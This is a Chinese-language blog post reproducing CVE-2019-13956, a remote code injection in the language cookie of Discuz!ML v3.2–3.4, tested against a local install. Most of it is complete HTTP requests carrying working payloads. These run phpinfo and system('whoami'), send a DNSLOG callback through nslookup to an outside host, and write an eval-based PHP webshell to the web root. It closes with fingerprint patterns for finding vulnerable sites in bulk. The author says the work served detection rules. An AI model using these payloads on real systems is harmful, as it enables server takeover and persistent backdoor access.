【复现】Discuz!ML V3.X 代码注入漏洞

远程代码注入漏洞

Posted by 看不尽的尘埃 on September 19, 2019

前言

最近在给公司写指纹规则、漏洞检测和利用规则,因此漏洞复现的文章更新会比较频繁。

0x00 漏洞介绍

  • 漏洞名称:Discuz!ML V3.X 代码注入漏洞
  • CVE编号:CVE-2019-13956
  • 发布时间:2019-06-14
  • 漏洞说明:该漏洞存在于请求流量中的cookie参数中的language字段,攻击者能够利用该漏洞在请求流量的cookie字段中(language参数)插入任意代码,最终执行任意代码,从而实现完全远程接管整个服务器的目的。
  • 影响范围:Discuz! ML v.3.4、Discuz! ML v.3.3、Discuz! ML v.3.2
  • 修复建议:目前官方暂未进行安全更新,使用该CMS的用户可时刻关注官方网站以及代码托管网站获取最新信息

0x01 环境搭建

首先去官网下载源码: http://discuz.ml/download 下载完成后,解压到WWW目录下,打开phpstudy,访问URL,出现安装界面: 图片 正确填写数据库信息和管理员信息点击下一步:

图片

稍等几秒后,出现completed说明安装完成: 图片

0x02 漏洞复现

Poc验证

我们可以利用phpinfo信息来验证漏洞是否存在:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: u7ip_2132_saltkey=E7E88rBR; u7ip_2132_language=sc'.phpinfo().'; u7ip_2132_lastvisit=1568853333; u7ip_2132_sid=eWnKtK; u7ip_2132_sendmail=1; u7ip_2132_lastact=1568857423%09index.php%09

图片

我们也可以利用system函数去执行系统命令来验证漏洞是否存在,whoami是Windows/Linux通用命令:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: u7ip_2132_saltkey=E7E88rBR; u7ip_2132_lastvisit=1568853333; u7ip_2132_sid=eWnKtK; u7ip_2132_sendmail=1; u7ip_2132_language=sc%27.system('whoami').%27; u7ip_2132_lastact=1568857490%09index.php%09

图片

但是whoami回显的内容不容易被程序识别,因此我们可以借用DNSLOG平台来验证,考虑到nslookup有些Linux服务器可能没有,也可以使用ping dnslog_server:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: u7ip_2132_saltkey=E7E88rBR; u7ip_2132_lastvisit=1568853333; u7ip_2132_sid=eWnKtK; u7ip_2132_sendmail=1; u7ip_2132_language=sc%27.system('nslookup 4evdeu.dnslog.cn').%27; u7ip_2132_lastact=1568857490%09index.php%09

图片

EXP利用

我们可以通过这个漏洞来写webshell,HTTP请求包如下,执行成功会返回正常页面,执行错误会报错,webshell在网站根目录下:

GET /discuz/index.php HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: X9O9_2132_saltkey=seXAWPyb; X9O9_2132_language=sc'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.'; X9O9_2132_lastvisit=1568854995; X9O9_2132_sid=ZUI7iz; X9O9_2132_sendmail=1; sid=abc48gBCCWNz%252FH9NX2yt9UHcyxMQp02Yw80wGxY%252B%252Bqf7oBiEN31WIcrdCg; X9O9_2132_lastact=1568858654%09index.php%09

图片

图片

0x03 Web指纹

想要批量怎么能木有指纹?!

  • <meta name=“generator” content=“Discuz! (.*?)” />
  • <meta name=“author” content=“Discuz!(.*?)” />

    0x04 总结

1、一开始在利用漏洞写php webshell的时候,出现了报错,最后是在Github上的利用工具中发现了不报错的EXP,这个项目的地址是https://github.com/theLSA/discuz-ml-rce/blob/master/dz-ml-rce.py,没有这个我估计又得自闭了。 2、在写策略的时候,遇到cookie随机的问题,通过写了一个正则表达式匹配了出来 [A-Za-z0-9]{4}_[A-Za-z0-9]{4}_language=[A-Za-z]{2}